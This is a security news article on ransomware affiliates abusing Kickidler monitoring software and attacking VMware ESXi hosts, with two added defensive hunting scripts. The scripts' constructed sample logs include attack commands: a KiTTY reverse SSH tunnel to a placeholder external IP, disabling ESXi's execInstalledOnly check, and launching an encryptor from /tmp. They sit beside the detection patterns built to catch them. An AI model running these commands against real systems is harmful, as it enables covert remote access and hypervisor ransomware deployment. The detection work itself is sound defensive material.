Sophisticated ransomware operations are exploiting the legitimate employee monitoring software Kickidler, transforming it from a workplace oversight tool into a potent espionage platform for deep network infiltration and credential theft.
Cybersecurity experts have recently detailed how affiliates of notorious ransomware groups, including Qilin and Hunters International, deploy Kickidler following initial breaches.
This abuse allows attackers to meticulously track user activity, capture keystrokes, record screen actions, and ultimately harvest sensitive information critical for escalating their attacks, particularly against valuable VMware ESXi environments. The findings, corroborated by multiple security news outlets in early May 2025, underscore a dangerous trend where trusted internal tools are subverted to bypass security measures.
Fake Download Sites Spread Trojanized Versions of Kickidler
The pathway into corporate networks often begins with a deceptive tactic aimed at IT administrators: Search Engine Optimization (SEO) poisoning. Attackers stand up malicious websites, such as a fake RVTools download site, and push them to the top of search results for the tool's name.
An unsuspecting administrator who downloads what appears to be a legitimate IT management utility like RVTools instead receives a trojanized installer. That installer typically deploys SMOKEDHAM, a PowerShell/.NET backdoor, which in turn installs Kickidler. The method is particularly effective because the victim is, by selection, someone who already holds the elevated privileges that an administrator account carries.
The strategic value of Kickidler for these threat actors is significant. Varonis explained that the software enables attackers to overcome defenses like decoupled backup system authentication:
“Kickidler addresses this issue by capturing keystrokes and web pages from an administrator’s workstation. This enables attackers to identify off-site cloud backups and obtain the necessary passwords to access them. This is done without dumping memory or other high-risk tactics that are more likely to be detected.”
Because the passwords are read off the administrator's screen and keyboard rather than dumped from process memory, the collection rarely trips the controls tuned for credential-dumping tools. The ultimate objective is frequently the encryption of critical infrastructure, leading to widespread operational disruption and substantial financial demands.
Attackers Exploit Legitimate Tools for Deep Network Access
The detailed mechanics of these attacks, as outlined by Varonis Threat Labs, reveal a patient and methodical approach. Once the SMOKEDHAM backdoor provides an initial foothold, attackers execute reconnaissance commands (such as `whoami`, `systeminfo` and `nslookup`) and exfiltrate the output to an attacker-controlled AWS EC2 instance. It is at this stage that Kickidler, often disguised under a name like `grabber.exe`, is deployed. Varonis theorizes that a subsequent period of apparent inactivity, sometimes lasting several days, is dedicated to credential harvesting through Kickidler's monitoring capabilities.
Lateral movement across the victim's network is then pursued with common IT tools such as Remote Desktop Protocol (RDP) and PsExec. In some instances, attackers deployed KiTTY, a fork of the PuTTY SSH client, to establish reverse RDP tunnels over SSH to their EC2 infrastructure, frequently running the SSH session over TCP port 443 so that it blends with outbound HTTPS and passes egress filters that only permit web ports.
As an additional persistence or command-and-control (C2) channel, Remote Monitoring and Management (RMM) software such as AnyDesk has also been observed. Data exfiltration precedes encryption; in the Varonis case study, attackers used WinSCP to steal nearly a terabyte of data. Kickidler itself is a commercial product that its developer says is used by more than 5,000 organizations; its ordinary features are simply repurposed for stealthy reconnaissance.
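Each stage described above leaves a distinct trace in endpoint telemetry, and the traces are far more convincing in combination than alone. The following hunting script, added here as an example and not code from Varonis, Synacktiv or Kickidler, runs five rules over constructed Sysmon-style events (event 1 = process creation, event 3 = network connection, using Sysmon's EventData field names): a burst of discovery commands from one parent process, a binary named `grabber.exe` or carrying Kickidler product metadata, an SSH client starting a reverse tunnel or connecting outbound on TCP 443, a PsExec service starting on a second host, and an RMM binary outside an (assumed empty) allowlist. The hostnames, user, process IDs and the 203.0.113.10 destination are all made up for the example.

```python
"""Hunting rules for the Kickidler/SMOKEDHAM intrusion chain (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
import ntpath
import re

DISCOVERY = {"whoami.exe", "systeminfo.exe", "nslookup.exe", "ipconfig.exe",
             "net.exe", "net1.exe", "nltest.exe", "quser.exe"}
SSH_CLIENTS = {"kitty.exe", "putty.exe", "plink.exe", "ssh.exe"}
KICKIDLER_NAMES = {"grabber.exe"}            # name reported for the dropped agent
RMM_BINARIES = {"anydesk.exe", "teamviewer.exe", "rustdesk.exe",
                "screenconnect.clientservice.exe"}  # illustrative, not exhaustive
APPROVED_RMM = set()                         # assumption: this org sanctions no RMM tool
INTERNAL = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
REVERSE_TUNNEL = re.compile(r"(?:^|\s)-R\s+\S+")        # -R = remote/reverse forward
PORT_443 = re.compile(r"(?:^|\s)-[pP]\s+443(?:\s|$)")    # -P (PuTTY/KiTTY) or -p (OpenSSH)


def base(path):
    return ntpath.basename(path or "").lower()


def is_external(ip):
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL)


def finding(rule, e, detail):
    return {"rule": rule, "computer": e["Computer"], "time": e["UtcTime"], "detail": detail}


def recon_burst(events, window=timedelta(minutes=5), threshold=3):
    """At least `threshold` distinct discovery tools from one parent within `window`."""
    groups = defaultdict(list)
    for e in events:
        if e["EventID"] == 1 and base(e["Image"]) in DISCOVERY:
            groups[(e["Computer"], e["ParentProcessId"])].append(e)
    out = []
    for (_, ppid), evs in groups.items():
        evs.sort(key=lambda e: e["UtcTime"])
        for i, first in enumerate(evs):
            seen = {base(e["Image"]) for e in evs[i:] if e["UtcTime"] - first["UtcTime"] <= window}
            if len(seen) >= threshold:
                out.append(finding("recon_burst", first,
                                   f"{sorted(seen)} under parent pid {ppid} ({base(first['ParentImage'])})"))
                break
    return out


def kickidler_agent(events):
    return [finding("kickidler_agent", e, e["Image"]) for e in events
            if e["EventID"] == 1 and (base(e["Image"]) in KICKIDLER_NAMES
                                      or "kickidler" in (e.get("Product") or "").lower())]


def ssh_tunnel_443(events):
    """Reverse-tunnel arguments on an SSH client, or an SSH client talking to an external host on 443."""
    out = []
    for e in events:
        if base(e["Image"]) not in SSH_CLIENTS:
            continue
        cmd = e.get("CommandLine", "")
        if e["EventID"] == 1 and (REVERSE_TUNNEL.search(cmd) or PORT_443.search(cmd)):
            out.append(finding("ssh_tunnel_443", e, cmd))
        elif e["EventID"] == 3 and e["DestinationPort"] == 443 and is_external(e["DestinationIp"]):
            out.append(finding("ssh_tunnel_443", e, f"{base(e['Image'])} -> {e['DestinationIp']}:443"))
    return out


def psexec_service(events):
    """PSEXESVC.exe is the service PsExec installs on the *target* of a lateral move."""
    return [finding("psexec_service", e, f"{e['Image']} spawned by {base(e['ParentImage'])}")
            for e in events if e["EventID"] == 1 and base(e["Image"]) == "psexesvc.exe"]


def unapproved_rmm(events):
    return [finding("unapproved_rmm", e, e["Image"]) for e in events
            if e["EventID"] == 1 and base(e["Image"]) in RMM_BINARIES - APPROVED_RMM]


def run_all(events):
    rules = (recon_burst, kickidler_agent, ssh_tunnel_443, psexec_service, unapproved_rmm)
    return sorted((f for r in rules for f in r(events)), key=lambda f: (f["time"], f["rule"]))


def ev(ts, computer, eid, **fields):
    return {"UtcTime": datetime.fromisoformat(ts), "Computer": computer, "EventID": eid, **fields}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [  # constructed for this example; the last two lines are benign noise that must not fire
    ev("2025-03-01T09:00:01", "ADMIN-WS01", 1, Image=r"C:\Windows\System32\whoami.exe", CommandLine="whoami", ParentImage=PS, ParentProcessId=4120),
    ev("2025-03-01T09:00:03", "ADMIN-WS01", 1, Image=r"C:\Windows\System32\systeminfo.exe", CommandLine="systeminfo", ParentImage=PS, ParentProcessId=4120),
    ev("2025-03-01T09:00:07", "ADMIN-WS01", 1, Image=r"C:\Windows\System32\nslookup.exe", CommandLine="nslookup corp.example", ParentImage=PS, ParentProcessId=4120),
    ev("2025-03-01T09:05:00", "ADMIN-WS01", 1, Image=r"C:\ProgramData\grabber.exe", CommandLine="grabber.exe", ParentImage=PS, ParentProcessId=4120, Product="Kickidler"),
    ev("2025-03-04T22:10:00", "ADMIN-WS01", 1, Image=r"C:\Users\jadmin\AppData\Local\Temp\kitty.exe", CommandLine="kitty.exe -ssh -P 443 -R 33389:127.0.0.1:3389 ubuntu@203.0.113.10", ParentImage=CMD, ParentProcessId=5222),
    ev("2025-03-04T22:10:01", "ADMIN-WS01", 3, Image=r"C:\Users\jadmin\AppData\Local\Temp\kitty.exe", DestinationIp="203.0.113.10", DestinationPort=443),
    ev("2025-03-05T01:30:00", "FS01", 1, Image=r"C:\Windows\PSEXESVC.exe", CommandLine="PSEXESVC.exe", ParentImage=r"C:\Windows\System32\services.exe", ParentProcessId=700),
    ev("2025-03-05T01:45:00", "FS01", 1, Image=r"C:\Users\jadmin\AppData\Roaming\AnyDesk\AnyDesk.exe", CommandLine="AnyDesk.exe --install", ParentImage=CMD, ParentProcessId=900),
    ev("2025-03-05T08:00:00", "HR-WS07", 3, Image=r"C:\Program Files\Google\Chrome\Application\chrome.exe", DestinationIp="203.0.113.50", DestinationPort=443),
    ev("2025-03-05T08:01:00", "HR-WS07", 1, Image=r"C:\Windows\System32\whoami.exe", CommandLine="whoami", ParentImage=CMD, ParentProcessId=3001),
]

if __name__ == "__main__":
    for f in run_all(SAMPLE_EVENTS):
        print(f["time"], f["computer"], f["rule"], f["detail"])
```

The per-parent windowing in `recon_burst` is what keeps the lone `whoami` from a help-desk session out of the results, and the 443 rule deliberately keys on the process image rather than the port: a browser on 443 is normal, an SSH client on 443 to an address outside RFC 1918 space is not. In production the events would come from `Get-WinEvent` or the SIEM rather than the inline list, and the RMM allowlist would name whatever the organization actually sanctions.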
Hunters International and the Targeting of VMware Infrastructure
Synacktiv's research, published earlier on March 5, 2025, provided an in-depth look at a Hunters International ransomware operation employing these same Tactics, Techniques, and Procedures (TTPs). Hunters International, which emerged around October 2023 after reportedly acquiring assets from the dismantled Hive ransomware group, was observed using a trojanized RVTools installer to deliver the SMOKEDHAM backdoor. Synacktiv linked SMOKEDHAM to the UNC2465 threat actor, an affiliate previously associated with the LockBit and DarkSide ransomware operations.
Following the backdoor, Kickidler (referred to by Synacktiv as "Grabber" and installed via `grem.msi`) was used for weeks to spy on an administrator. Synacktiv researchers highlighted the novelty of this approach, stating, "This is the first time we see such a legitimate tool employed by attackers." BleepingComputer had reported in August 2024 on the same group disseminating the SharpRhino RAT via typosquatting sites.
The compromise of VMware ESXi hypervisors is a primary goal for these attackers. Synacktiv detailed the use of a PowerShell script that leveraged VMware PowerCLI and WinSCP Automation to deploy a Rust-based ESXi encryptor.
This script automated connecting to vCenter, enabling the SSH service on each ESXi host, and then using WinSCP to transfer and execute the ransomware. A critical step involved disabling ESXi's integrity check for executable files, the control that refuses to run binaries which were not installed from a signed VIB; with it off, an arbitrary file dropped on a datastore can be executed. The ransomware itself, which featured a terminal user interface, was often set for delayed execution.
It would stop virtual machines, encrypt their files (targeting extensions like .vmx, .vmdk, .vmsn), and then attempt to overwrite free disk space to hinder recovery. Unusually, this specific ESXi encryptor did not leave a ransom note on the affected systems.
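The deployment sequence above (SSH enabled, the executable integrity check switched off, a dropped binary made executable, virtual machines powered off, the binary launched) is visible on the hypervisor itself, because ESXi's `shell.log` records every command typed into the ESXi Shell or an SSH session. The script below is an added example, not Synacktiv's script or a reproduction of it, and runs a small set of command-pattern rules plus a per-host time-window correlation over constructed log lines. The line layout (timestamp, host, `shell[pid]: [user]: command`) approximates what a syslog collector receives from ESXi 7/8 and is labelled as such; the integrity setting is assumed to be `execInstalledOnly`, the ESXi option that restricts execution to VIB-installed binaries. Hostnames, PIDs and VM IDs are invented.

```python
"""Correlate ESXi shell.log commands into a ransomware-deployment alert (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed collector format: "<ts> <host> shell[<pid>]: [<user>]: <command>"
LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+shell\[\d+\]:\s+\[(?P<user>[^\]]+)\]:\s+(?P<cmd>.*)$")

# Each rule is (name, regex over the command text).
RULES = [
    # execInstalledOnly set to 0/FALSE via either the runtime or the kernel-option form
    ("exec_installed_only_disabled",
     re.compile(r"execInstalledOnly.*?(?:-i\s+0\b|-v\s+(?:FALSE|false|0)\b)")),
    ("ssh_enabled", re.compile(r"vim-cmd\s+hostsvc/(?:enable|start)_ssh")),
    ("vm_power_off", re.compile(r"vim-cmd\s+vmsvc/power\.off|esxcli\s+vm\s+process\s+kill")),
    ("chmod_exec", re.compile(r"chmod\s+(?:\+x|[0-7]*7[0-7]*)\s+/(?:tmp|vmfs)/")),
    # a binary launched from /tmp, a datastore or the current directory (optionally via nohup)
    ("unsigned_binary_exec",
     re.compile(r"(?:^|&&\s*|;\s*)(?:nohup\s+)?(?:\./|/tmp/|/vmfs/volumes/)\S+")),
]
CRITICAL = {"exec_installed_only_disabled", "unsigned_binary_exec"}


def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"].rstrip("Z"))
    return rec


def evaluate(lines):
    """One finding per (line, rule) match; unparseable lines are skipped."""
    out = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        for name, rx in RULES:
            if rx.search(rec["cmd"]):
                out.append({**rec, "rule": name})
    return out


def deployment_alerts(findings, window=timedelta(minutes=30), min_rules=3):
    """Alert when one host shows >= min_rules distinct rules inside `window`,
    at least one of them critical. A single VM power-off never alerts on its own."""
    by_host = defaultdict(list)
    for f in findings:
        by_host[f["host"]].append(f)
    alerts = []
    for host, fs in by_host.items():
        fs.sort(key=lambda f: f["ts"])
        for i, first in enumerate(fs):
            rules = {f["rule"] for f in fs[i:] if f["ts"] - first["ts"] <= window}
            if len(rules) >= min_rules and rules & CRITICAL:
                alerts.append({"host": host, "start": first["ts"], "rules": rules})
                break
    return alerts


SAMPLE_LOG = [  # constructed: a deployment on esx01, routine hardening and one reboot on esx02
    "2025-03-05T02:00:05Z esx01 shell[2098765]: [root]: vim-cmd vmsvc/getallvms",
    "2025-03-05T02:00:12Z esx01 shell[2098765]: [root]: esxcli system settings advanced set -o /User/execInstalledOnly -i 0",
    "2025-03-05T02:00:40Z esx01 shell[2098765]: [root]: chmod +x /tmp/encryptor",
    "2025-03-05T02:00:41Z esx01 shell[2098765]: [root]: vim-cmd vmsvc/power.off 12",
    "2025-03-05T02:00:43Z esx01 shell[2098765]: [root]: vim-cmd vmsvc/power.off 14",
    "2025-03-05T02:01:02Z esx01 shell[2098765]: [root]: nohup /tmp/encryptor --delay 600 &",
    "2025-03-05T09:15:00Z esx02 shell[2100001]: [root]: esxcli system settings advanced set -o /User/execInstalledOnly -i 1",
    "2025-03-05T09:16:30Z esx02 shell[2100001]: [root]: vim-cmd vmsvc/power.off 3",
    "not a shell.log line",
]

if __name__ == "__main__":
    for a in deployment_alerts(evaluate(SAMPLE_LOG)):
        print(a["host"], a["start"], sorted(a["rules"]))
```

Two points of the design matter in practice. The `exec_installed_only_disabled` rule matches only the value being set to 0/FALSE, so the administrator on esx02 re-enabling the control (`-i 1`) does not fire, and the correlation requires several distinct rules plus a critical one, so a single power-off during maintenance stays quiet. The preventive counterpart is to leave the setting enabled (my understanding is `esxcli system settings advanced set -o /User/execInstalledOnly -i 1` for the runtime option and `esxcli system settings kernel set -s execInstalledOnly -v TRUE` for the boot option; verify against your ESXi version), keep the SSH service stopped except during a change window, and ship `shell.log` and `auth.log` off the host, since an encryptor that overwrites free space will also take the local copies with it.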
The Wider Perils of Monitoring Software and Defensive Postures
The malicious exploitation of Kickidler occurs against a backdrop of broader concerns regarding workplace surveillance technologies. While the current incidents involve active weaponization by external threat actors, the inherent risks of monitoring software were highlighted in an accidental leak concerning the WorkComposer application.
That case involved the accidental exposure of over 21 million employee screenshots due to an improperly secured Amazon S3 bucket—a reminder of the sensitive data these tools handle, even without malicious interference. WorkComposer’s own terms and conditions attempt to disclaim liability for such internet security breaches.
The abuse of legitimate Remote Monitoring and Management (RMM) tools is a persistent threat recognized by cybersecurity authorities. A joint advisory from CISA, the NSA, and MS-ISAC in January 2023 specifically warned about attackers deceiving victims into installing portable remote desktop software.
To counter these tactics, security experts advocate a layered defense-in-depth approach. The recommendations that recur across the advisories are: audit every remote access tool present in the environment; enforce application control so that unapproved RMM software cannot execute; mandate the organization's sanctioned remote access path (a VPN or VDI) and treat any other remote access as an incident; and block inbound and outbound traffic on the ports and protocols that common RMM tools use unless a specific business need requires them.
Varonis, for instance, stresses the importance of securing all seven layers of cybersecurity, from the human element through to critical data infrastructure.